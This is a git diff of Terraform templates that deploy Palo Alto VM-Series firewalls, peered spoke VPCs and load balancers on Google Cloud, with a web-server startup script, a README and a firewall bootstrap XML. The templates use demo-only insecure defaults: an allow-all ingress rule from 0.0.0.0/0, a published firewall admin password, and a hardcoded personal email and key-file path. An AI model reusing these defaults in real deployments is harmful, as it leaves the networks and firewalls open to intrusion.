b/gcp/adv-peering-with-lbnh/modules/create_vm/main.tf new file mode 100644 index 00000000..dd140b46 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_vm/main.tf @@ -0,0 +1,127 @@ +variable vm_names { + type = "list" +} +variable vm_machine_type {} +variable vm_zones { + type = "list" +} +variable vm_ssh_key {} + +variable vm_image {} +variable vm_subnetworks { + type = "list" +} + +variable vm_scopes { + type = "list" + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + + +variable internal_lb_create { + default = false +} + +variable "internal_lb_health_check" { + default = "22" +} + +variable "internal_lb_ports" { + type = "list" + default = ["80"] +} + +variable "internal_lb_name" { + default = "intlb" +} + +variable "internal_lb_ip" { + default = "" +} + +variable create_instance_group { + default = false +} + +variable startup_script { +default = "" +} + + +resource "google_compute_instance" "vm" { + count = "${length(var.vm_names)}" + name = "${element(var.vm_names, count.index)}" + machine_type = "${var.vm_machine_type}" + zone = "${element(var.vm_zones, count.index)}" + can_ip_forward = true + allow_stopping_for_update = true + metadata_startup_script = "${var.startup_script}" + + + metadata { + serial-port-enable = true + sshKeys = "${var.vm_ssh_key}" + } + + network_interface { + subnetwork = "${element(var.vm_subnetworks, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.vm_image}" + } + } + + service_account { + scopes = "${var.vm_scopes}" + } +} + +resource "google_compute_instance_group" "instance_group" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-group" + zone = "${var.vm_zones[0]}" + + instances = [ + "${google_compute_instance.vm.*.self_link}", + ] +} + + + + +resource "google_compute_health_check" "health_check" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-check-${count.index}" + + tcp_health_check { + port = "${var.internal_lb_ports[0]}" + } +} + +resource "google_compute_region_backend_service" "backend_service" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-backend-${count.index}" + health_checks = ["${google_compute_health_check.health_check.self_link}"] + + backend { + group = "${google_compute_instance_group.instance_group.self_link}" + } +} + + +resource "google_compute_forwarding_rule" "forwarding_rule" { + count = "${var.internal_lb_create}" + name = "${var.internal_lb_name}-tcp" + load_balancing_scheme = "INTERNAL" + ip_address = "${var.internal_lb_ip}" + ports = "${var.internal_lb_ports}" + subnetwork = "${var.vm_subnetworks[0]}" + backend_service = "${google_compute_region_backend_service.backend_service.self_link}" +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/modules/create_vmseries/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vmseries/main.tf new file mode 100644 index 00000000..8a87285a --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_vmseries/main.tf @@ -0,0 +1,176 @@ +variable fw_subnetworks { + type = "list" +} + +variable fw_names { + type = "list" +} + +variable fw_machine_type {} + +variable fw_zones { + type = "list" +} + +variable fw_cpu_platform { + default = "Intel Skylake" +} + +variable fw_bootstrap_bucket { + default = "" +} + +variable fw_ssh_key {} + +variable public_lb_create { + default = false +} + +variable fw_scopes { + type = "list" + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable fw_image {} + +variable fw_tags { + type = "list" + default = [] +} + +variable create_instance_group { + default = false +} + +variable instance_group_names { + type = "list" + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = "list" + default = [] +} + +variable fw_nic0_ip { + type = "list" + default = [] +} + +variable fw_nic1_ip { + type = "list" + default = [] +} + +variable fw_nic2_ip { + type = "list" + default = [] +} + +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +#************************************************************************************ +# CREATE VMSERIES +#*********************************************************************************** +resource "google_compute_instance" "vmseries" { + count = "${length(var.fw_names)}" + name = "${element(var.fw_names, count.index)}" + machine_type = "${var.fw_machine_type}" + zone = "${element(var.fw_zones, count.index)}" + min_cpu_platform = "${var.fw_cpu_platform}" + can_ip_forward = true + allow_stopping_for_update = true + tags = "${var.fw_tags}" + + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}" + serial-port-enable = true + sshKeys = "${var.fw_ssh_key}" + } + + service_account { + scopes = "${var.fw_scopes}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[0]}" + access_config = {} + network_ip = "${element(var.fw_nic0_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[1]}" + access_config = {} + network_ip = "${element(var.fw_nic1_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[2]}" + network_ip = "${element(var.fw_nic2_ip, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.fw_image}" + } + } + + depends_on = [ + "null_resource.dependency_getter", + ] +} + +#************************************************************************************ +# CREATE INSTANCE GROUP +#************************************************************************************ +resource "google_compute_instance_group" "vmseries" { + count = "${(var.create_instance_group) ? length(var.fw_names) : 0}" + name = "${element(var.instance_group_names, count.index)}" + zone = "${element(var.fw_zones, count.index)}" + instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"] + + named_port { + name = "http" + port = "80" + } +} + + + + + + +#************************************************************************************ +# OUTPUTS +#************************************************************************************ + +output "fw_names" { + value = "${google_compute_instance.vmseries.*.name}" +} + +output "fw_self_link" { + value = "${google_compute_instance.vmseries.*.self_link}" +} + +output "instance_group" { + value = "${google_compute_instance_group.vmseries.*.self_link}" +} + + +output "fw_nic0_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip}" +} + +output "fw_nic1_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}" +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/modules/create_vmseries_ilbnh/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vmseries_ilbnh/main.tf new file mode 100644 index 00000000..87300c85 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_vmseries_ilbnh/main.tf @@ -0,0 +1,173 @@ +variable enable_ilbnh { + default = true +} +variable fw_subnetworks { + type = "list" +} + +variable fw_names { + type = "list" +} + +variable fw_machine_type {} + +variable fw_zones { + type = "list" +} + +variable fw_cpu_platform { + default = "Intel Skylake" +} + +variable fw_bootstrap_bucket { + default = "" +} + +variable fw_ssh_key {} + +variable public_lb_create { + default = false +} + +variable fw_scopes { + type = "list" + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable fw_image {} + +variable fw_tags { + type = "list" + default = [] +} + +variable create_instance_group { + default = false +} + +variable instance_group_names { + type = "list" + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = "list" + default = [] +} + +variable fw_nic0_ip { + type = "list" + default = [] +} + +variable fw_nic1_ip { + type = "list" + default = [] +} + +variable fw_nic2_ip { + type = "list" + default = [] +} +variable instance_group { + type = "list" + default = [] +} + +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +#************************************************************************************ +# CREATE VMSERIES +#*********************************************************************************** +resource "google_compute_instance" "vmseries" { + count = "${(length(var.fw_names) > 0 && var.enable_ilbnh) ? length(var.fw_names) : "0" }" + name = "${element(var.fw_names, count.index)}" + machine_type = "${var.fw_machine_type}" + zone = "${element(var.fw_zones, count.index)}" + min_cpu_platform = "${var.fw_cpu_platform}" + can_ip_forward = true + allow_stopping_for_update = true + tags = "${var.fw_tags}" + + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}" + serial-port-enable = true + sshKeys = "${var.fw_ssh_key}" + } + + service_account { + scopes = "${var.fw_scopes}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[0]}" + access_config = {} + network_ip = "${element(var.fw_nic0_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[1]}" + access_config = {} + network_ip = "${element(var.fw_nic1_ip, count.index)}" + } + + network_interface { + subnetwork = "${var.fw_subnetworks[2]}" + access_config = {} + network_ip = "${element(var.fw_nic2_ip, count.index)}" + } + + boot_disk { + initialize_params { + image = "${var.fw_image}" + } + } + + depends_on = [ + "null_resource.dependency_getter", + ] +} + +#************************************************************************************ +# CREATE INSTANCE GROUP +#************************************************************************************ +resource "google_compute_instance_group" "vmseries" { + count = "${(var.create_instance_group && var.enable_ilbnh) ? length(var.fw_names) : 0}" + name = "${element(var.instance_group_names, count.index)}" + zone = "${element(var.fw_zones, count.index)}" + instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"] +} + +#************************************************************************************ +# OUTPUTS +#************************************************************************************ + +output "fw_names" { + value = "${google_compute_instance.vmseries.*.name}" +} + +output "fw_self_link" { + value = "${google_compute_instance.vmseries.*.self_link}" +} + +output "instance_group" { + value = "${concat(google_compute_instance_group.vmseries.*.self_link, list(""), list(""))}" +} + +output "fw_nic0_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip}" +} + +output "fw_nic1_public_ip" { + value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}" +} diff --git a/gcp/adv-peering-with-lbnh/modules/create_vpc/main.tf b/gcp/adv-peering-with-lbnh/modules/create_vpc/main.tf new file mode 100644 index 00000000..e4511595 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/modules/create_vpc/main.tf @@ -0,0 +1,71 @@ +variable vpc_name {} + +variable subnetworks { + type = "list" +} + +variable ip_cidrs { + type = "list" +} + +variable regions { + type = "list" +} + +variable ingress_allow_all { + default = true +} + +variable ingress_sources { + type = "list" + default = ["0.0.0.0/0"] +} + +resource "google_compute_network" "default" { + name = "${var.vpc_name}" + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + count = "${length(var.subnetworks)}" + name = "${element(var.subnetworks, count.index)}" + ip_cidr_range = "${element(var.ip_cidrs, count.index)}" + region = "${element(var.regions, count.index)}" + network = "${google_compute_network.default.self_link}" +} + +resource "google_compute_firewall" "ingress_all" { + count = "${var.ingress_allow_all}" + name = "${google_compute_network.default.name}-ingress-all" + network = "${google_compute_network.default.self_link}" + direction = "INGRESS" + source_ranges = "${var.ingress_sources}" + + allow { + protocol = "all" + } +} + +output "subnetwork_id" { + value = "${google_compute_subnetwork.default.*.id}" +} + +output "subnetwork_name" { + value = "${google_compute_subnetwork.default.*.name}" +} + +output "subnetwork_self_link" { + value = "${google_compute_subnetwork.default.*.self_link}" +} + +output "vpc_name" { + value = "${google_compute_network.default.*.name}" +} + +output "vpc_id" { + value = "${google_compute_network.default.*.id[0]}" +} + +output "vpc_self_link" { + value = "${google_compute_network.default.*.self_link[0]}" +} diff --git a/gcp/adv-peering-with-lbnh/outputs.tf b/gcp/adv-peering-with-lbnh/outputs.tf new file mode 100644 index 00000000..28bd734c --- /dev/null +++ b/gcp/adv-peering-with-lbnh/outputs.tf @@ -0,0 +1,52 @@ +#************************************************************************************ +# OUTPUTS +#************************************************************************************ +output " IMPORTANT!! PLEASE READ!! " { + value = [ + "===================================================================================", + "Before proceeding, you must enable import/export custom routes on all peering links", + "and remove the default (0.0.0.0/0) route from TRUST, SPOKE1, and SPOKE2 VPCs", + "There is also a need to create a default route in the ilb-trust-subnet pointing to", + "the internal load balancer", + "==================================================================================="] +} +output "GLB-ADDRESS " { + value = "http://${module.vmseries_public_lb.address}" +} + +output "MGMT-URL-FW1 " { + value = "https://${module.vm_fw.fw_nic1_public_ip[0]}" +} + +output "MGMT-URL-FW2 " { + value = "https://${module.vm_fw.fw_nic1_public_ip[1]}" +} +output "MGMT-URL-ILB-FW3 " { + value = "https://${module.vm_fw_ilbnh.fw_nic1_public_ip[0]}" +} + +output "MGMT-URL-ILB-FW4 " { + value = "https://${module.vm_fw_ilbnh.fw_nic1_public_ip[1]}" +} +output "SSH-SPOKE1-VM1-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 221 -i " +} + +output "SSH-SPOKE1-VM2-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 222 -i " +} + +output "SSH-SPOKE2-FW1" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[0]} -p 223 -i " +} + +output "SSH-SPOKE1-VM1-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 221 -i " +} +output "SSH-SPOKE1-VM2-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 222 -i " +} + +output "SSH-SPOKE2-FW2" { + value = "ssh ubuntu@${module.vm_fw.fw_nic0_public_ip[1]} -p 223 -i " +} diff --git a/gcp/adv-peering-with-lbnh/scripts/showheaders.php b/gcp/adv-peering-with-lbnh/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh b/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh new file mode 100644 index 00000000..3576db4e --- /dev/null +++ b/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh @@ -0,0 +1,8 @@ +#!/bin/bash +until sudo apt-get update; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done diff --git a/gcp/adv-peering-with-lbnh/spoke1.tf b/gcp/adv-peering-with-lbnh/spoke1.tf new file mode 100644 index 00000000..7cae884c --- /dev/null +++ b/gcp/adv-peering-with-lbnh/spoke1.tf @@ -0,0 +1,79 @@ +provider "google" { + credentials = "${var.spoke1_project_authfile}" + project = "${var.spoke1_project}" + region = "${var.region}" + alias = "spoke1" +} + +#************************************************************************************ +# CREATE SPOKE1 VPC & SPOKE1 VMs (w/ INTLB) +#************************************************************************************ +module "vpc_spoke1" { + source = "./modules/create_vpc/" + vpc_name = "spoke1-vpc" + subnetworks = ["spoke1-subnet"] + ip_cidrs = ["10.10.1.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] + + providers = { + google = "google.spoke1" + } +} + +module "vm_spoke1" { + source = "./modules/create_vm/" + vm_names = ["spoke1-vm1", "spoke1-vm2"] + vm_zones = ["${var.region}-a", "${var.region}-a"] + vm_machine_type = "f1-micro" + vm_image = "ubuntu-os-cloud/ubuntu-1604-lts" + vm_subnetworks = ["${module.vpc_spoke1.subnetwork_self_link[0]}", "${module.vpc_spoke1.subnetwork_self_link[0]}"] + vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}" + startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}" // default "" - runs no startup script + + internal_lb_create = true // default false + internal_lb_name = "spoke1-intlb" // default "intlb" + internal_lb_ports = ["80", "443"] // default ["80"] + internal_lb_ip = "10.10.1.100" // default "" (assigns an any available IP in subnetwork ) + + providers = { + google = "google.spoke1" + } +} + +#************************************************************************************ +# CREATE PEERING LINK SPOKE1-to-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke1_to_trust" { + name = "spoke1-to-trust" + network = "${module.vpc_spoke1.vpc_self_link}" + peer_network = "${module.vpc_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.ilb_trust_to_spoke2", + ] + provider = "google.spoke1" +} +#************************************************************************************ +# CREATE PEERING LINK SPOKE1-to-ilb-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke1_to_ilb_trust" { + name = "spoke1-to-ilb-trust" + network = "${module.vpc_spoke1.vpc_self_link}" + peer_network = "${module.ilb_trust.vpc_self_link}" + + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.spoke1_to_trust", + ] + provider = "google.spoke1" +} \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/spoke2.tf b/gcp/adv-peering-with-lbnh/spoke2.tf new file mode 100644 index 00000000..591bdb24 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/spoke2.tf @@ -0,0 +1,72 @@ +provider "google" { + credentials = "${var.spoke2_project_authfile}" + project = "${var.spoke2_project}" + region = "${var.region}" + alias = "spoke2" +} + +#************************************************************************************ +# CREATE SPOKE2 VPC & SPOKE2 VM +#************************************************************************************ +module "vpc_spoke2" { + source = "./modules/create_vpc/" + vpc_name = "spoke2-vpc" + subnetworks = ["spoke2-subnet"] + ip_cidrs = ["10.10.2.0/24"] + regions = ["${var.region}"] + ingress_allow_all = true + ingress_sources = ["0.0.0.0/0"] + + providers = { + google = "google.spoke2" + } +} + +module "vm_spoke2" { + source = "./modules/create_vm/" + vm_names = ["spoke2-vm1"] + vm_zones = ["${var.region}-a"] + vm_machine_type = "f1-micro" + vm_image = "ubuntu-os-cloud/ubuntu-1604-lts" + vm_subnetworks = ["${module.vpc_spoke2.subnetwork_self_link[0]}"] + vm_ssh_key = "ubuntu:${var.ubuntu_ssh_key}" + + providers = { + google = "google.spoke2" + } +} + +#************************************************************************************ +# CREATE PEERING LINK SPOKE2-to-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke2_to_trust" { + name = "spoke2-to-trust" + network = "${module.vpc_spoke2.vpc_self_link}" + peer_network = "${module.vpc_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.spoke1_to_ilb_trust", + ] + provider = "google.spoke2" +} +#************************************************************************************ +# CREATE PEERING LINK SPOKE2-to-ilb-TRUST +#************************************************************************************ +resource "google_compute_network_peering" "spoke2_to_ilb_trust" { + name = "spoke2-to-ilb-trust" + network = "${module.vpc_spoke2.vpc_self_link}" + peer_network = "${module.ilb_trust.vpc_self_link}" + + provisioner "local-exec" { + command = "sleep 45" + } + + depends_on = [ + "google_compute_network_peering.spoke2_to_trust", + ] + provider = "google.spoke2" +} diff --git a/gcp/adv-peering-with-lbnh/variables.tf b/gcp/adv-peering-with-lbnh/variables.tf new file mode 100644 index 00000000..0b4fda73 --- /dev/null +++ b/gcp/adv-peering-with-lbnh/variables.tf @@ -0,0 +1,70 @@ +#************************************************************************************ +# GCP VARIABLES +#************************************************************************************ +variable enable_ilbnh { + default = true +} + +variable "region" { + default = "us-central1" +} + +#************************************************************************************ +# main.tf PROJECT ID & AUTHFILE +#************************************************************************************ +variable "main_project" { + description = "Existing project ID for main project (all resources deployed in main.tf)" + default = "ilb-2019" +} + +variable "main_project_authfile" { + description = "Authentication file for main project (all resources deployed in main.tf)" + default = "/Users/dspears/GCP/ilb-2019-key.json" +} + +#************************************************************************************ +# spoke1.tf PROJECT ID & AUTHFILE +#************************************************************************************ +variable "spoke1_project" { + description = "Existing project for spoke1 (can be the same as main project and can be same as main project)." + default = "ilb-2019" +} + +variable "spoke1_project_authfile" { + description = "Authentication file for spoke1 project (all resources deployed in spoke1.tf)" + default = "/Users/dspears/GCP/ilb-2019-key.json" +} + +#************************************************************************************ +# spoke2.tf PROJECT ID & AUTHFILE +#************************************************************************************ +variable "spoke2_project" { + description = "Existing project for spoke2 (can be the same as main project and can be same as main project)." + default = "ilb-2019" +} + +variable "spoke2_project_authfile" { + description = "Authentication file for spoke2 project (all resources deployed in spoke2.tf and can be same as main project)" + default = "/Users/dspears/GCP/ilb-2019-key.json" +} + +#************************************************************************************ +# VMSERIES SSH KEY & IMAGE (not required if bootstrapping) +#************************************************************************************ +variable "vmseries_ssh_key" { + default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAXsXFhJABLkPEsF2NC/oLJ5sj/cZDXso+qPy30nllU5w== davespears@gmail.com" +} + +#************************************************************************************ +# UBUNTU SSH KEY +#************************************************************************************ +variable "ubuntu_ssh_key" { + default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAXsXFhJABLkPEsF2NC/oLJ5sj/cZDXso+qPy30nllU5w== davespears@gmail.com" + } + +variable "vmseries_image" { + # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-814" + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814" + + # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814" +} diff --git a/gcp/adv_peering_2fw_2spoke/README.md b/gcp/adv_peering_2fw_2spoke/README.md new file mode 100644 index 00000000..40a0f00a --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/README.md @@ -0,0 +1,72 @@ +## 2 x VM-Series / 2 x Spoke VPCs via Advanced Peering +Terraform creates 2 VM-Series firewalls that secure ingress/egress traffic for 2 spoke VPCs. The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. After the build completes, several manual changes must be performed to enable transitive routing. The manual changes are required since they cannot be performed through Terraform, yet. + +### Overview +* 5 x VPCs (mgmt, untrust, trust, spoke1, & spoke2) with relevant peering connections +* 2 x VM-Series (BYOL / Bundle1 / Bundle2) +* 2 x Ubuntu VM in spoke1 VPC (install Apache during creation) +* 1 x Ubuntu VM in spoke2 VPC +* 1 x GCP Public Load Balancer (VM-Series as backend) +* 1 x GCP Internal Load Balancer (spoke1 VM's as backend) +* 1 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness) +
+

+ +

+ + +### Prerequistes +1. Terraform +2. Access to GCP Console + +After deployment, the firewalls' username and password are: + * **Username:** paloalto + * **Password:** Pal0Alt0@123 + +### Deployment +1. Download the **adv_peering_2fw_2spoke** repo to the machine running the build +2. In an editor, open **variables.tf** and set values for the following variables + +| Variable | Description | +| :------------- | :------------- | +| `main_project` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. | +| `main_project_auth_file` | Authentication key file for main_project | +| `spoke1_project` | Project ID for spoke1 VMs, VPC, & internal load balancer | +| `spoke1_project_auth_file`| Authentication key file for spoke1_project | +| `spoke2_project` | Project ID for spoke2 VM & VPC | +| `spoke2_project_auth_file` | Authentication key file for spoke2_project | +| `ubuntu_ssh_key` | Public key used to authenticate to Ubuntu VMs (**user must be ubuntu**) | +| `vmseries_image` | Uncomment the VM-Series license you want to deploy | + +3. Download project authenication key files to the main directory of the terraform build. +

+ +

+ +4. Execute Terraform +``` +$ terraform init +$ terraform plan +$ terraform apply +``` + +5. After deployment finishes, for EACH PEER, enable **Import custom routes** & **Export custom routes** + +

+ +

+ +6. Remove default GCP VPC route for spoke1-vpc, spoke2-vpc, & trust-vpc + +

+ +

+ +7. From Terraform output, go to `GLB-ADDRESS = http://` in a web browser. NOTE: IT MAY TAKE SEVERAL MINUTES FOR SPOKE1 VMs TO FULLY INSTALL APACHE & PHP SETUP. +

+ +

+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml similarity index 84% rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml rename to gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml index 5f91248d..cceeb051 100644 --- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml +++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml @@ -136,32 +136,7 @@ no - Allow-HTTPS - - - - - - - - no - - - - - no - - - yes - - - no - - 1460 - - no - - Allow-HTTPS + mgmt-profile @@ -175,12 +150,10 @@ - - - - - + yes + yes + yes @@ -341,11 +314,19 @@ + + no + + + no + + + no + ethernet1/1 ethernet1/2 - ethernet1/3 @@ -357,7 +338,7 @@ - 10.5.1.1 + 192.168.1.1 None @@ -370,41 +351,44 @@ ethernet1/1 10 0.0.0.0/0 + + + - - - 10.5.2.1 - - - None - + no any 2 + + 192.168.2.1 + + + None + ethernet1/2 10 - 10.5.2.0/24 + 10.10.1.0/24 - + no any 2 - 10.5.3.1 + 192.168.2.1 None - ethernet1/3 + ethernet1/2 10 - 10.5.3.0/24 + 10.10.2.0/24 @@ -421,11 +405,20 @@ - + download-and-install - + 15 + + + + + download-and-install + 30 + + + US/Pacific @@ -443,7 +436,7 @@ yes no - no + yes no @@ -461,18 +454,17 @@ DO NOT USE FOR PRODUCTION FQDN - c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1 yes no - no + yes no - vm-series 8.8.8.8 4.2.2.2 + mgmt-interface-swap
@@ -489,20 +481,13 @@ DO NOT USE FOR PRODUCTION - + ethernet1/2 - - - - ethernet1/3 - - - @@ -555,7 +540,7 @@ DO NOT USE FOR PRODUCTION ping - application-default + any any @@ -564,9 +549,9 @@ DO NOT USE FOR PRODUCTION yes allow - + - web-zone + trust-zone untrust-zone @@ -588,6 +573,7 @@ DO NOT USE FOR PRODUCTION service-http + service-https any @@ -595,13 +581,10 @@ DO NOT USE FOR PRODUCTION yes yes allow - Required to access web-server over the VM-Series untrust interface's elastic/public IP address. - - + - db-zone - web-zone + trust-zone untrust-zone @@ -619,12 +602,10 @@ DO NOT USE FOR PRODUCTION any - ping ssh - service-tcp-221 - service-tcp-222 + any any @@ -635,13 +616,12 @@ DO NOT USE FOR PRODUCTION no If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222. - + - untrust-zone + trust-zone - db-zone - web-zone + trust-zone any @@ -659,7 +639,7 @@ DO NOT USE FOR PRODUCTION any - application-default + any any @@ -667,20 +647,19 @@ DO NOT USE FOR PRODUCTION yes yes allow - This rule is required so the web-server and db-server can bootstrap with Apache and mysql for the demo. - + - db-zone + untrust-zone - web-zone + trust-zone - web-server + any - db-server + any any @@ -689,7 +668,7 @@ DO NOT USE FOR PRODUCTION any - mysql + any application-default @@ -700,23 +679,12 @@ DO NOT USE FOR PRODUCTION yes yes allow - - - - Test Drive - - - - - - web-server - 22 - + @@ -734,20 +702,22 @@ DO NOT USE FOR PRODUCTION any - 10.5.1.4 + any - service-tcp-221 + service-http ipv4 + no + + spoke1-intlb + 80 + + ethernet1/1 - - - db-server - 22 - + - ethernet1/3 + ethernet1/2 @@ -761,17 +731,17 @@ DO NOT USE FOR PRODUCTION any - 10.5.1.4 + any - service-tcp-222 + service-tcp-221 ipv4 - no + + spoke1-vm + 22 + + ethernet1/1 - - - 